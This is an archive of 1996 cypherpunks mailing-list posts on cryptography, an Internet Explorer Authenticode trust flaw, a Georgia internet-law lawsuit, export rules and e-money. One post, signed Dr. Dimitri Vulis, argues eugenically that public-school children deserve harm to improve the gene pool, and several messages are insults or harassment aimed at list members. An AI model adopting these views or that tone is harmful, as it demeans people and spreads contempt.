have not bothered to read Schneier : or other basic texts on ciphers, why would they bother to read a Snake Oil : FAQ? This applies to their customers as well. I disagree, I think AC is a pretty scary book for the kind of people who need the Snake-Oil FAQ. I think the primary target audiences are IS professionals who are considering integrating crypto into their data communications and end users who want to send encrypted mail. Neither of these groups is going to embrace crypto if you toss them a tome like AC. And what is the primary goal here, if not to promote widespread use of crypto and educate about what makes good crypto good. We have to approach the non-believers on their own ground ;) mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMka8HRz4pZwIaHjdAQE8agf+JKgzhzva47IarTXlOmmg869UdWl88WAF cIQ7uNCXlb7xB9RXmFAHIBTWRy8S+cgkvfEbjPaWmX2dx1038a1Lk96q5kj+6kTq w0REVj+4FuJ8atgM3PxJljGSzEL5ADjAMicnmKSSBILOK8AU6d/DLquF2Y2rvBgs 7oJkCPH0m/oS87qQuivjEuUoHInrNuvuWC2BrmJ4J7UAvsfT+Zm3WcFpILpvHJ8O YkVR1IYFU7Q30vaS2eRG4AWCrLcn6tln0fnntGCAjavJz5PD3KMGigRPhE87zdBy Ht7foguSJwqxI4x+mhJh7PrYoJ6UzqQlqEAbGNTbRJL3CLfs3RStdg== =7ncj -----END PGP SIGNATURE----- From mccoy at communities.com Mon Sep 23 17:30:50 1996 From: mccoy at communities.com (Jim McCoy) Date: Tue, 24 Sep 1996 08:30:50 +0800 Subject: provably hard PK cryptosystems In-Reply-To: Message-ID: Asgaard writes: >On Sun, 22 Sep 1996, Timothy C. May wrote: >> Suppose a tile is placed at some place on the grid, and another tile >> (possibly a different tile, possibly the same type of tile) is placed some >> distance away on the grid. The problem is this: Can a "domino snake" be >> found which reaches from the first tile to the second tile, with the >> constraint that edges must match up on all tiles? (And all tiles must be in >> normal grid locations, of course) > >Intuitively (but very well not, I'm not informed enough to know) >this might be a suitable problem for Hellman's DNA computer, the >one used for chaining the shortest route including a defined >number of cities? Solving such a problem is easy to break down into parallel steps, but the advantage of using the infinite plane (or even a plane with "really large" boundaries) which Tim mentioned is that you can make the search space larger than anything which can possibly be solved in a reasonable amount of time by these methods. For example, factoring composites of very large primes can also be done by such massively parallel systems, but othe individual parts are no faster (actually they are almost always slower) than regular computing elements. Given a large enough search space even a parallel system runs out of processing elements. jim From camcc at abraxis.com Mon Sep 23 18:11:24 1996 From: camcc at abraxis.com (camcc at abraxis.com) Date: Tue, 24 Sep 1996 09:11:24 +0800 Subject: Live Cybercast of GA lawsuit press conference Message-ID: <2.2.32.19960923194304.006aacb0@smtp1.abraxis.com> >X-Sender: rcostner at intergate.net >Date: Mon, 23 Sep 1996 11:48:46 -0400 >To: efg-action at ninja.techwood.org >Reply-To: efg-action at ninja.techwood.org > >Live Cybercast of HB1630 lawsuit press conference > >The ACLU, Electronic Frontiers Georgia, Mitchell Kaye (Georgia State >Representative), and others will hold a press conference on their lawsuit >against the State of Georgia, concerning HB1630, which is now law. The joint >press conference will be broacast live on the internet at 10:30 am on Tuesday >September 24, 1996. To listen to the press conference, see > > http://www.efga.org/realaudio/hb1630.htm > >A note about EFGA: Electronic Frontiers Georgia has a new website >. We are now referring to ourselves as EFGA, rather >than EFG. Please update your websites accordingly. > > -- Robert Costner (770) 512-8746 > Electronic Frontiers Georgia > rcostner at intergate.net > http://www.efga.org/ From frissell at panix.com Mon Sep 23 18:38:27 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 24 Sep 1996 09:38:27 +0800 Subject: TAG_ent Message-ID: <3.0b19.32.19960923154738.009fceb0@panix.com> > security issues are solved, he said. "The Internet is > fundamentally flawed in that regard right now," Reed > said. "At this moment in time at least, we at Citicorp > would feel very uncomfortable accommodating any > transactions on the Internet," he said. But then they thought Plus and Cirrus were bad ideas as well. DCF From trei at process.com Mon Sep 23 19:03:35 1996 From: trei at process.com (Peter Trei) Date: Tue, 24 Sep 1996 10:03:35 +0800 Subject: Another security problem reported in Microsoft's Internet Explor Message-ID: <199609232003.NAA24214@toad.com> (This is posted to both www-security and cypherpunks. Please be careful where you send responses). See: http://www.news.com/News/Item/0,4,3707,00.html at C|net's news site for the whole story. Short version: InfoSpace has released a program as an IE plugin, which, once the user has agreed to install it, registers InfoSpace as a 'trusted publisher' in Explorer. This apparently means that later requests to download Infospace programs would not trigger the dialog boxes requesting permission to download. InfoSpace describes this as a bug, and is releasing a corrected version. Commentary: I hope that all IE plugin (ActiveX, script, whatever) publishers are as responsive. Ideally, I suppose, a downloaded executable component should not be able to silently manipulate the security policies of the system it arrives on, but it's hard to see how to prevent this in Microsoft's active content model. The Java model is more robustly protected against this problem, but as a result is not as capable. The scary thing is that a clever author of Trojan horses could write an ActiveX control which does nothing but open the gates, and let other programs in without the Authenticode check. It could even let in another version of itself, which is also properly signed, but has no malicous code. Thus, it could cover it's tracks. Peter Trei trei at process.com Disclaimer: I do not represent my employer. From laverty at matrixNet.com Mon Sep 23 19:09:39 1996 From: laverty at matrixNet.com (laverty at matrixNet.com) Date: Tue, 24 Sep 1996 10:09:39 +0800 Subject: A daily warning regarding Tim ... [edited] Message-ID: <2.2.32.19960923202301.009551fc@sunrise.matrixnet.com> Eudora Pro 2.2 will also filter out all of the crap... At 08:24 AM 9/23/96 -0500, you wrote: >>On Fri, 20 Sep 1996, John Anonymous MacDonald wrote: >> >>> Tim C[*] * studied yoga back-streching exercises for >>> five years so he could * * (*). >> >>Likely the NSA has nothing better to do these days. They got bored with >>just listening, so now they're spamming. Can we lock this fucker out of >>the list? Sure, he'll probably pick another nym to post from... >> > > >Can't lock him out of the list, but you can either set up a kill file, or find >something like the 3.0b version of Eudora, which has filters; you can set it up >where, if an incoming message has a certain From: string, it is transferred >directly into the Trash mail folder, which is, as a rule, cleaned up before >quitting. > >Daniel. > >-- >If in fact we are the only intelligent life on this planet, why the fuck are >we in this goddamn mess? >-- >Find my public key on the World Wide Web -- point your browser at: >http://bs.mit.edu:8001/pks-toplev.html > > > > From haggis at brutus.bright.net Mon Sep 23 19:24:54 1996 From: haggis at brutus.bright.net (Hamish) Date: Tue, 24 Sep 1996 10:24:54 +0800 Subject: Taking crypto out of the U.S. Message-ID: Soon I am going to be going overseas to Japan, and I want to take my notebook with me so I can keep up with everything, however, I have encrypted my hard drive and usually encrypt my mail. Is this in violation of the ITAR to keep everything the same when I go over? From somebody at tempest.ashd.com Mon Sep 23 19:28:53 1996 From: somebody at tempest.ashd.com (somebody at tempest.ashd.com) Date: Tue, 24 Sep 1996 10:28:53 +0800 Subject: Snooping ISP admin?? In-Reply-To: <32468D68.5E2@hooked.net> Message-ID: On Mon, 23 Sep 1996, Michael E. Carboy wrote: > Greetings All, > > Question for the group: I have encountered a situation that causes me > to believe an ISP is snoopingthrough encrytped mail. It seems that > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > encountered "POP3 account in use by another user" several times in the > past few days and I am the only user... wondering if that "in use" > messsage is the result of a clumsy sysadmin being caught with his hand > in the cookie jar. Any thoughts from the group??? If those more > knowledgeable than I deem these NOISE... my sincere apologies. All I got to say is that if a admin wanted to get your mail using POP3 would be last thing one would try. Since the admin reign over the machine he could just copy your mail file and do what he wishes at this point. Besides most admins including myself really want to bother talking to users most of the time let alone read there mail. Carlos From camcc at abraxis.com Mon Sep 23 19:34:33 1996 From: camcc at abraxis.com (camcc at abraxis.com) Date: Tue, 24 Sep 1996 10:34:33 +0800 Subject: GA HB1630 Lawsuit: Press Advisory Message-ID: <2.2.32.19960923194301.0069bebc@smtp1.abraxis.com> >X-Sender: rcostner at intergate.net >Reply-To: efg-action at ninja.techwood.org > >Joint Media Advisory: > >AMERICAN CIVIL LIBERTIES UNION >ELECTRONIC FRONTIERS GEORGIA >REP. MITCHELL KAYE > >Groups to Mount Legal Challenge to Georgia Cyberspace Law > >FOR IMMEDIATE RELEASE Contact: See list below >Friday, September 20, 1996 > > ATLANTA, GA-- -The American Civil Liberties Union, Electronic Frontiers >Georgia, Georgia State Representative Mitchell Kaye (R-Marietta) and others >will be holding a news conference on Tuesday, September 24 at 10:30 a.m., >immediately after filing a lawsuit seeking a preliminary injunction against a >Georgia law barring communications in cyberspace. > > The suit names Governor Zell Miller and Attorney General Michael Bowers as >defendants, and will be filed on behalf of 13 plaintiffs. >------------------------------------------------------------------------------ >-------------------------------------- > > WHO: > >Attorneys Ann Beeson (ACLU) and Scott McClain (Bondurant, Mixson & Elmore) > >Plaintiffs Robert Costner (executive director, Electronic Frontiers Georgia); >Jeff Graham (AIDS Survival Project); Rep. Mitchell Kaye (GA House of >Representatives); Bonnie Nadri (The Page Factory); Teresa Nelson (ACLU of >Georgia); Eric Van Pelt (Atlanta Veterans Alliance); Josh Riley (individual >plaintiff); and Kimberly LyleWilson (Atlanta Freethought Society). > > WHAT: > >News conference to announce filing of legal challenge to Georgia >cyberspace law. > > WHEN: > >Tuesday, September 24, 10:30 a.m. > > WHERE: > >ACLU of Georgia >142 Mitchell Street SW (at Peachtree), Suite 301, Atlanta >(404) 523-6201 > >Note: Copies of the brief and plaintiff affidavits will be available at the >news conference and online at the EFGA website, and >through the ACLU's website and America Online site >(keyword: ACLU). > >Contacts: Teresa Nelson, ACLU GA Ann Beeson, national ACLU: 404-523-6201 > Robert Costner, EFGA: 770-512-8746 > Rep. Mitchell Kaye: 770-998-2399 > Scott McClain: 404-881-4138 > Emily Whitfield, ACLU Nat'l Press Office: 212-944-9800 x426 > > > From hallam at vesuvius.ai.mit.edu Mon Sep 23 19:39:05 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Tue, 24 Sep 1996 10:39:05 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609230102.SAA01161@mail.pacifier.com> Message-ID: <9609232148.AA17056@vesuvius.ai.mit.edu> So Jim Bell is opposed to "truly random attacks on ordinary citizens" Its this type ofappoligia for terrorism that disgusts me utterly. He is calling for murder but wants to dress it up in whatever psychotic justifications he can. He is also completely wrong. When the IRA attemoted to assasinate my cousin I was in no way intimidated and neither was he. He continued as a senior poitician for over a decade despite continued danger. I can think of no less effective method of bringing about change in attitudes. I am in no way intimidated by Bell either. He is a kook and I don;t think it he is worth further consideration. Phill From runnerfx at octet.com Mon Sep 23 19:39:21 1996 From: runnerfx at octet.com (Wearen Life) Date: Tue, 24 Sep 1996 10:39:21 +0800 Subject: Go away CIA In-Reply-To: <199609232104.RAA29874@ginger.capitalnet.com> Message-ID: Must we go thru this again? On Mon, 23 Sep 1996, Wayne H. Allen wrote: > At 08:45 AM 9/23/96 -0400, Wearen Life wrote: > >The CIA has many powers both great and small. If the can cover up findings > >of UFO's > > > > Has this list sunk that low? > Wayne H.Allen > whallen at capitalnet.com > Pgp key at www.capitalnet.com/~whallen > > From die at pig.die.com Mon Sep 23 19:42:05 1996 From: die at pig.die.com (Dave Emery) Date: Tue, 24 Sep 1996 10:42:05 +0800 Subject: Crypto Files in the BA Archives (fwd) Message-ID: <9609232028.AA23926@pig.die.com> Forwarded message: >From boatanchors at theporch.com Mon Sep 23 14:15:39 1996 Date: Mon, 23 Sep 1996 12:54:28 -0500 (CDT) Message-Id: Errors-To: listown at jackatak.theporch.com Reply-To: jproc at worldlinx.com Originator: boatanchors at theporch.com Sender: boatanchors at theporch.com Precedence: bulk From: jproc at worldlinx.com To: Multiple recipients of list Subject: Crypto Files in the BA Archives X-Listprocessor-Version: 6.0c -- ListProcessor by Anastasios Kotsikonas X-Comment: Amateur Radio Equipment Using Vacuum Tubes Content-Type: TEXT/PLAIN; charset=US-ASCII Mime-Version: 1.0 X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc. Dear BA'ers, For those of you in the group who are interested in crypto gear, I have posted two files to the BA archives which discuss the KL7 off line crypto unit and the KWR-37 online crypto receiver. To obtain the files, send a message to: listprocessor at theporch.com In the body of the message type: get boatanchors kl7.crypto.unit get boatanchors kwr37.crypto.receiver The second article is the one which will be submitted to AWA Old Timers Bulletin. BA'ers get to read it first. Regards, ------------------------------------- Jerry Proc VE3FAB E-mail: jproc at worldlinx.com HMCS Haida Naval Museum Toronto, Ontario 'Looking for a 'AN/SRC-501' ------------------------------------- From wombat at mcfeely.bsfs.org Mon Sep 23 19:42:17 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 24 Sep 1996 10:42:17 +0800 Subject: The periodic word of advice about Timmy C. Maypole, the pathological liar In-Reply-To: <199609231805.UAA28245@basement.replay.com> Message-ID: On Mon, 23 Sep 1996, Anonymous wrote: > as the Russian sailor was the one who satisfied her the > most. ^^^^^^^ Ah, now we're getting somewhere ... From nobody at replay.com Mon Sep 23 19:43:32 1996 From: nobody at replay.com (Anonymous) Date: Tue, 24 Sep 1996 10:43:32 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609231808.MAA09908@InfoWest.COM> Message-ID: <199609232306.BAA27840@basement.replay.com> attila wrote: > = .Clearly, speech that makes someone uncomfortable must be banned by > = .the government. > > = .-Declan > > is that what you really meant? pretty liberal is it not? [silliness deleted out of mercy] One widely noted benefit of political repression is that people develop a very nuanced sense of language - irony, for example. From shamrock at netcom.com Mon Sep 23 19:43:35 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 24 Sep 1996 10:43:35 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Timothy C. May wrote: > Whoops! I didn't mean to intersect with "workplace" issues--I mean simple, > pure, nonworkplace-related speech. As long as the person that you are speaking to is employed in any way, workplace issues apply. Even if you talk to the person after work and away from their place of employment. The courts have ruled that the speech does not have to occur at the workplace to be prohibited. All that is required is that the person is affected at the workplace. Yes, you can be sued for sexual harrasment for trying to pick up a stranger in a bar, should that stranger still feel bothered by your advances while at work the next day. The courts have ruled, --Lucky From krenn at nym.alias.net Mon Sep 23 19:43:47 1996 From: krenn at nym.alias.net (Krenn) Date: Tue, 24 Sep 1996 10:43:47 +0800 Subject: Snake-Oil FAQ Message-ID: <199609232331.TAA15378@anon.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- Tim May wrote: > The reason I recommend anonymous remailer distribution, and pseudonyms, is > because of the litigation issue. Even if reviewers are not sued often, the > threat of a suit influences reviews, which is why most reviews in most mags > are puff pieces (glowing reviews, often strongly correlated with who is > advertising in the mag). One can imagine Matt Blaze, for example, choosing > to say _nothing_ about SnakeTronics' ScrambleMatic, for fear (justified) > that he might get letters from their lawyers, thus taking up his time and > even eventually landing him in court. I agree, hence my original post. I for one would not contribute to such a list without anonymity, tho my critiques might be right. The hassle of dealing with a person or organization bent on causing you legal headache is more than I am willing to deal with. It is obvious, given the current state of the legal system in this country, that a lawsuit against a even a well-respected cryptographer might drag on for some time, costing ennumerable dollars and hours, and _might_ even succeed. Krenn -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkcaT0nqfwPpt/QVAQHzJwP/VG1E60TeZ8xtomW2VmKO/b/jV+a6orWT ebxhtlCX6CicVYtS0L4NBqcY8rQk8bcbeMXed3o5tY7B4FHwANml9Ubcbg7Wo7yL 2JvWI2E6M/4yfKIPuO0aqId57Qx5v36RiDAjZsozKhOJERTGasFJCOFOu/pMOa6M 36lWaXY0tyg= =PTUE -----END PGP SIGNATURE----- From sunder at brainlink.com Mon Sep 23 19:49:02 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 24 Sep 1996 10:49:02 +0800 Subject: Dimitri Spams In-Reply-To: Message-ID: On Fri, 20 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Ray Arachelian writes: > > > Dimitri, get a life! We need Dimitri Spams as much as we needed > > Perrygrams. Which is to say, we need them not at all! > > I see you lied when you claimed to have killfiled me. Watch your attribution there Mr. Detweiler, I never said I killfiled you. I don't kill file people. I DELETE them. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From gary at systemics.com Mon Sep 23 19:52:10 1996 From: gary at systemics.com (Gary Howland) Date: Tue, 24 Sep 1996 10:52:10 +0800 Subject: Security flaw in Microsft Explorer Message-ID: <199609231826.UAA16049@internal-mail.systemics.com> Program compromises IE security By Nick Wingfield September 23, 1996, 10:45 a.m. PT A start-up Internet company has posted a program on the Net that could allow Web sites to bypass the security controls in Internet Explorer, CNET has learned. The company, InfoSpace, created a program aimed at Net search engines such as Lycos and Excite that want to become the default search engine in Microsoft's Internet Explorer 3.0. But the program, which is actually featured on the Lycos Web site, manages to circumvent Explorer's security warning window--an action that could let InfoSpace sneak programs onto a user's personal computer without warning. Although the InfoSpace program apparently was not created with malicious intent, it underscores the fragility of Internet Explorer's security defenses, as well as broader security issues related to downloading software over the Internet. The InfoSpace program sidesteps a security feature in Internet Explorer, called Authenticode, which is designed to allow users to verify the origins of a piece of software code, such as an ActiveX control, a script, or a plug-in. The Authenticode system requires a user to entrust the developer of a program, whether it's InfoSpace, Lotus Development, or IBM, not to install viruses or other destructive programs on the user's system. Although Authenticode does not prevent software developers from creating such programs, they can be held legally accountable for bad code. That's because the programs contain "digital signatures," a sort of ID card that allows perpetrators to be tracked down by law enforcement agencies. Microsoft works with VeriSign to provide digital signatures for programs. Last month, VeriSign took matters into its own hands by asking a developer, Fred McLain, to remove an ActiveX control called Exploder from his Web site. The Exploder control was designed to crash a user's computer after downloading. "Code signing is not a guarantee of code quality," Charles Fitzgerald, a product manager at Microsoft said. "It's an accountability trail." As with all digitally signed programs, users are offered the option to accept or to reject the InfoSpace program before installing it on their systems. Users are also offered the option to bypass the Authenticode warning window for all InfoSpace programs in the future. But the company's program registers InfoSpace as a "trusted publisher" in Explorer, effectively opening the browser to intrusions. The operation is akin to inviting a guest over to your house for dinner and having them copy the key to your front door without permission. InfoSpace executives denied that there was any malice intended in its program, adding that it has provided Lycos with an updated version of the code. Lycos plans to post the new program later this evening, according to InfoSpace. "It was a bug that got incorporated into the production code," InfoSpace CEO Naveen Jain said. Lycos CEO Bob Davis said he was not aware of the bug in the InfoSpace program and could not comment on it. The program is identified as Lycos Quick Search on the search engine's site. However, Microsoft officials expressed concern, saying it is hard to defend against once a user has consented to download code from the Net. "Clearly their software is doing something a tad aggressive," said Rob Price, a group program manager for Internet security at Microsoft."[With Authenticode], users are making a one-time trust decision, this is a persistent trust decision." Microsoft argued that Explorer provides better security than Netscape Communications' Navigator, which does not currently allow digital signatures on plug-ins. In Explorer, users are warned before downloading code even if the program does not contain a digital signature, though the source of the program is not identified. In contrast to plug-in software and ActiveX controls, Java applets are prevented from damaging a user's computer through built-in restrictions in the Java Virtual Machine. "Java is the model for dynamic executable content on the Net," said Eric Greenberg, group security manager at Netscape. From whallen at capitalnet.com Mon Sep 23 19:53:13 1996 From: whallen at capitalnet.com (Wayne H. Allen) Date: Tue, 24 Sep 1996 10:53:13 +0800 Subject: Go away CIA Message-ID: <199609232104.RAA29874@ginger.capitalnet.com> At 08:45 AM 9/23/96 -0400, Wearen Life wrote: >The CIA has many powers both great and small. If the can cover up findings >of UFO's Has this list sunk that low? Wayne H.Allen whallen at capitalnet.com Pgp key at www.capitalnet.com/~whallen From dfloyd at io.com Mon Sep 23 19:56:09 1996 From: dfloyd at io.com (Douglas R. Floyd) Date: Tue, 24 Sep 1996 10:56:09 +0800 Subject: Snooping ISP admin?? In-Reply-To: <32468D68.5E2@hooked.net> Message-ID: <199609232112.QAA07155@xanadu.io.com> > > Greetings All, > > Question for the group: I have encountered a situation that causes me > to believe an ISP is snoopingthrough encrytped mail. It seems that > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > encountered "POP3 account in use by another user" several times in the > past few days and I am the only user... wondering if that "in use" > messsage is the result of a clumsy sysadmin being caught with his hand > in the cookie jar. Any thoughts from the group??? If those more > knowledgeable than I deem these NOISE... my sincere apologies. An admin could just copy the mail spool file to a safer place, then read through at their leisure. Unless its someone totally clueless (which some ISP's are), I doubt that they are pulling off the pop3d. It could be that your mail spool file is locked by a mail transport agent, and that is why that error message is occuring. Any thoughts? From tcmay at got.net Mon Sep 23 19:57:45 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 10:57:45 +0800 Subject: provably hard PK cryptosystems Message-ID: At 4:29 PM 9/23/96, Asgaard wrote: >On Sun, 22 Sep 1996, Timothy C. May wrote: > >> Suppose a tile is placed at some place on the grid, and another tile >> (possibly a different tile, possibly the same type of tile) is placed some >> distance away on the grid. The problem is this: Can a "domino snake" be >> found which reaches from the first tile to the second tile, with the >> constraint that edges must match up on all tiles? (And all tiles must be in >> normal grid locations, of course) > >Intuitively (but very well not, I'm not informed enough to know) >this might be a suitable problem for Hellman's DNA computer, the >one used for chaining the shortest route including a defined >number of cities? No, massive parallelism does not help with the _general_ case. (For any specific instance, especially for a finite grid, obviously the amount of CPU power is directly relevant.) Even assuming Adleman's "DNA computer" works and scales relatively well, its CPU power only goes up roughly with the volume of the computer. While it may sound impressive to speak of "moles" of computers, or "swimming pools" of computers, such volumes are utterly inadequate to solve combinatorially-explosive problems. (Remember, it doesn't take a very big RSA product before the 10^75 elementary particles in the Universe are not enough to factor it in a billion times the age of the Universe even if every particle were a Cray! So much for a tank full of DNA computers.) The domino snake or tiling problem is a similarly explosive problem. Try playing around with some tiles on even a 5 x 5 grid, and then contemplate how large 25! is. Then think about a 10 x 10 grid, and 100! Then a 100 x 100 grid. And it may be that the domino snake reaching from tile A to tile B snakes around and about in a far, far larger grid space than this! (Even if one is confined to a 100 x 100 grid, easily displayed on a sheet of graph paper, no intelligence in the universe will ever be able to find a snake reaching from A to B, except in special situations (e.g., the same tile, etc.).) This sort of problem is the essence of some "zero knowledge interactive proof systems" (ZKIPS) sorts of proofs. I present such a snake as proof that I am who I say I am. (Because I just "made up" some random snake, then announced only the starting and stopping points, A and B. Nobody else in the universe could ever find such a snake, but I can display my solution as proof I generated it in the first place. Of course, once shown I have given the proof away to everyone. The ZKIPS trick is in twiddling the grid and/or tiles in such a way that I can give _probabalistic_ information away. I don't know how to do this for the domino snake problem, but it's easy to understand the Hamiltonian cycle version.) --Tim May (Late News: I just heard (12:30 p.m., PDT) that Seymour Cray is in extremely critical condition after suffering head injuries in a car crash. It will be a sad day if he dies, or is permanently disabled. Though he started working for the Agency in the 1950s, in a precursor to Control Data Corporation, and worked for them on various contracts in the next couple of decades, he was a true pioneer. (The CDC 6600, 7600, etc., and the Cray-1 were funded by contracts from the AEC and NSA, and the first few of each were delivered to Fort Meade, Los Alamos, Livermore, etc.)) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Mon Sep 23 19:58:22 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 24 Sep 1996 10:58:22 +0800 Subject: Public Schools In-Reply-To: <3.0b19.32.19960923103721.00a13340@panix.com> Message-ID: Duncan Frissell writes: > As a libertarian, I would add that the social atmosphere of a Stalinist > "brain factory" is not exactly the socialization I would choose for my > children. I would choose a more market oriented model. Libertarians are fucking statists, as I keep pointing out. U.S. public school system is darwinian evolution in action. Parents who can afford to send their kids to private schools, do so. Parents who send their kids to public schools deserve to have their offsprings fucked up, mentally and phsyically, to improve the species' gene pool. There are plenty of excellent private elementary and secondary schools in the U.S. Children who deserve better schooling (by virtue of having parents who have better genes and are therefore economically successful) get it. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mech at eff.org Mon Sep 23 20:01:37 1996 From: mech at eff.org (Stanton McCandlish) Date: Tue, 24 Sep 1996 11:01:37 +0800 Subject: US Govt. recent involvement in digital money & dig. signature issues Message-ID: <199609232219.PAA09930@eff.org> [Excerpted from Edupage.] ALL EYES ON E-MONEY Treasury Secretary Robert Rubin has formed a task force to examine what impact the move toward electronic money transfer and storage technologies will have on consumers. Specifically, the team will look at how these technologies will affect lower-income Americans, and assess standards for consumer protection. The task force also will come up with non-regulatory measures that can be taken to protect consumers while allowing the market to develop. "I want to be certain that we make the right decisions as we begin this new era so that the benefits of these developments are broadly shared and have a positive impact on our economy," says Rubin. (Investor's Business Daily 20 Sep 96 A19) Meanwhile, the Bank of Japan and Nippon Telegraph & Telephone Corp. have jointly developed a very advanced, secure electronic money system, using NTT's high-speed digital signature system and its patented E-sign algorithm. The new system allows a number of banks to issue the same type of e-money to customers, relieving them of the responsibility of developing their own proprietary e-money systems. NTT hopes its new system will become the de facto standard for e-money in the country. (BNA Daily Report for Executives 13 Sep 96 A2) [...] POSTAL SERVICE TESTS ELECTRONIC POSTMARK The U.S. Postal Service is testing a system that would place an electronic postmark on e-mail messages, verifying the date and time the message was sent, and guaranteeing that the content had not been tampered with. The new system would enable more business functions to be conducted electronically, and would also provide an archive service, maintaining copies of "e-postmarked" mail, should any questions arise later. The current test will determine what price people would expect to pay for such a service, and which features work best. (St. Petersburg Times 20 Sep 96 E6) -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From paul at fatmans.demon.co.uk Mon Sep 23 20:02:43 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 24 Sep 1996 11:02:43 +0800 Subject: Factoring technique, faster than trial division? Message-ID: <843513658.17121.0@fatmans.demon.co.uk> just an idea I came up with today, I don`t suggest it is a fast factoring method, but it would be interesting to know if it is faster than say trial division: Calcuate a composite number H such that H has a large number of prime factors (hundreds). now use the euclidean algorithm to try to find a gcd of X (the number being factored) and H, if there is none try a new H, if there is you have found a factor. It is hardly elegant but I would nevertheless be interested to see if it is apreciably faster than other kludge methods like trial division. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From sameer at c2.net Mon Sep 23 20:03:15 1996 From: sameer at c2.net (sameer at c2.net) Date: Tue, 24 Sep 1996 11:03:15 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: Message-ID: <199609232122.OAA15542@atropos.c2.org> > Unfortunately, this means that Germany wins. How does this mean that Germany wins? "radikal 154" is still available all over the world, at almost 50 mirror sites, I beleive (including http://www.c2.net/radikal/), which are *not* blocked by Germany. -- Sameer Parekh Voice: 510-986-8770 C2Net FAX: 510-986-8777 The Internet Privacy Provider http://www.c2.net/ sameer at c2.net From wombat at mcfeely.bsfs.org Mon Sep 23 20:03:21 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 24 Sep 1996 11:03:21 +0800 Subject: Mercenaries In-Reply-To: Message-ID: > > _Almost_ more important to me than "libertarian" ideals are "consistency" > ideals: namely, that there oughtn't to be laws which are not enforced, or > which are too expensive to enforce, or which can be selectively enforced. > And since I know that the full suite of laws, all 25,000 or 45,000 of them > (on all 27 linear feet of bookshelf space) cannot possibly be consistently > enforced, I favor a "minimalist" or "fallback" position of having > relatively few laws, covering mostly "crimes" which are more easily > detected and prosecuted (with draconian punishments). Nice idea, but it will never happen. All those laws are the result of two things; law makers, who feel they are elected and paid to make laws, and the sort of people who feel they have the "right" (legal, moral, who knows?) to do whatever isn't strictly prohibited. -r.w. From jya at pipeline.com Mon Sep 23 20:05:43 1996 From: jya at pipeline.com (John Young) Date: Tue, 24 Sep 1996 11:05:43 +0800 Subject: SAK_net Message-ID: <199609232219.WAA27822@pipe4.ny3.usa.pipeline.com> On Sep 23, 1996 14:16:40, 'John Fricker ' wrote: >Didn't SAIC buy Network Solutions (registration part of the NIC) as well? Yes. This is part of the Administration's plan for government and industry cooperation to provide a secure information infrastructure for beneficial commerce and education and well-being of the commonweal, as well as joyful, healthy and even-tempered computer-addicted families in beautiful cyber-communities, even a tad of on-line virtual racial and gender justice, not counting assurance of a bountiful food and flowing spirits and languid afternoons of concupiscence and gluttony, overwatched by faith in a SupremeOrderliness, all arrayed along clean-wiped, info-streets and never-sweat GAK-global policies, just quiet, timely and comfortable transportation across speedbumpless borders, and, for the eyes and ears, lots of time left over for staring at the landscape rushing by and enjoying Tesh and Streisand and Julio and Jane's Addiction. Al Gore's office promised straight-jacketly. From m5 at vail.tivoli.com Mon Sep 23 20:19:28 1996 From: m5 at vail.tivoli.com (Mike McNally) Date: Tue, 24 Sep 1996 11:19:28 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: <32472AF1.1417@vail.tivoli.com> Lucky Green wrote: > > Yes, you can be sued for sexual harrasment for trying to pick up a > stranger in a bar, should that stranger still feel bothered by your > advances while at work the next day. > > The courts have ruled, To paraphrase the probably-great Charles Haynes, "my bullshit meter is jiggling up near the red line". Is there really a case of a person being convicted of workplace sexual harassment against somebody they didn't work with? [ Yes, I realize that civil law makes very little sense sometimes. ] ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 